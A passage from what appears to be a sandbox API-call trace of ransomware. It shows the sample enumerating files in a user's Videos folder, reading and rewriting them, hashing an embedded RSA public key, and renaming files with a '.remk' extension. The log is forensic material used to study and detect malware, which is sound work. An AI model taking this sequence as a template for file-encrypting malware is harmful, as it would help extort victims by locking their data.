hHeap=0x630000) returned 1 [0237.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0237.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb28 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb70 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb10 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcae0 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcac8 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf648 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0237.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0237.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0237.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.970] WriteFile (in: hFile=0x640, lpBuffer=0x37c8278*, nNumberOfBytesToWrite=0x24a6, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c8278*, lpNumberOfBytesWritten=0x3adfb14*=0x24a6, lpOverlapped=0x0) returned 1 [0237.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c8278 | out: hHeap=0x630000) returned 1 [0237.970] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x24ab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.970] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0237.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0237.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0237.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0237.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0237.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0237.971] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0237.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.971] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.971] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0237.971] CloseHandle (hObject=0x640) returned 1 [0237.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0237.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e0) returned 0x37bd408 [0237.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31891a0 | out: hHeap=0x630000) returned 1 [0237.974] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\S Vy53\\KqR1qrw6aoyjKfrEgvI.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\s vy53\\kqr1qrw6aoyjkfregvi.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\S Vy53\\KqR1qrw6aoyjKfrEgvI.flv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\s vy53\\kqr1qrw6aoyjkfregvi.flv.remk")) returned 1 [0237.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0237.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.975] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0237.977] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ce78970, ftCreationTime.dwHighDateTime=0x1d5d7e6, ftLastAccessTime.dwLowDateTime=0xde495a90, ftLastAccessTime.dwHighDateTime=0x1d5e120, ftLastWriteTime.dwLowDateTime=0xde495a90, ftLastWriteTime.dwHighDateTime=0x1d5e120, nFileSizeHigh=0x0, nFileSizeLow=0x14cec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YBiLRAZYH9yEkpgFaG.swf", cAlternateFileName="YBILRA~1.SWF")) returned 1 [0237.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xee) returned 0x3192918 [0237.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.977] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\S Vy53\\YBiLRAZYH9yEkpgFaG.swf") returned=".swf" [0237.977] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\S Vy53\\YBiLRAZYH9yEkpgFaG.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\s vy53\\ybilrazyh9yekpgfag.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0237.978] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=85228) returned 1 [0237.978] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0237.981] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x14cc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.981] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.983] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.983] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x14cec, lpOverlapped=0x0) returned 1 [0238.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0238.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0238.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0238.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0238.002] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694fd0) returned 1 [0238.003] CryptCreateHash (in: hProv=0x694fd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0238.003] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0238.003] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0238.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0238.004] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0238.004] GetLastError () returned 0x0 [0238.004] CryptDestroyHash (hHash=0x31de170) returned 1 [0238.004] CryptReleaseContext (hProv=0x694fd0, dwFlags=0x0) returned 1 [0238.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0238.004] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0238.004] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0238.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0238.004] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0238.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0238.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0238.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14cf0) returned 0x37cf820 [0238.005] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0238.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0238.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0238.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0238.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0238.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf648 [0238.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcac8 [0238.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf690 [0238.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcae0 [0238.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb10 [0238.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb70 [0238.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb28 [0238.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0238.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0238.006] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0238.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0238.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb10 | out: hHeap=0x630000) returned 1 [0238.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb28 | out: hHeap=0x630000) returned 1 [0238.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb70 | out: hHeap=0x630000) returned 1 [0238.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0238.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb70 [0238.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0238.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bcb28 [0238.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0238.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bcb10 [0238.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0238.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0238.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0238.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0238.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0238.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0238.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0238.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0238.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0238.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb28 | out: hHeap=0x630000) returned 1 [0238.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0238.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb10 | out: hHeap=0x630000) returned 1 [0238.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0238.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0238.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb70 | out: hHeap=0x630000) returned 1 [0238.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0238.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0238.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0238.007] GetCurrentThreadId () returned 0x314 [0238.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0238.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c7130 [0238.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0238.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694fd0 [0238.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0238.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0238.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0238.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0238.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0238.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0238.008] GetCurrentThreadId () returned 0x314 [0238.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0238.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0238.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x319bc40 [0238.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0238.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0238.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0238.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0238.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0238.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0238.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0238.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0238.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0238.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0238.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0238.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb70 [0238.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0238.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0238.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0238.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0238.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0238.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0238.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0238.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0238.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb10 [0238.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0238.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0238.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0238.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0238.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0238.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0238.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0238.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb28 [0238.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0238.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0238.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0238.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcaf8 [0238.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0238.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb88 [0238.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0238.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0238.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0238.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb58 [0238.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0238.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb40 [0238.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0238.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bcba0 [0238.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb40 | out: hHeap=0x630000) returned 1 [0238.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bcb40 [0238.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb58 | out: hHeap=0x630000) returned 1 [0238.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0238.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0238.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0238.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0238.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0238.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb10 | out: hHeap=0x630000) returned 1 [0238.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb10 [0238.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0238.010] RtlAllocateHeap (HeapHandle=0x630000, 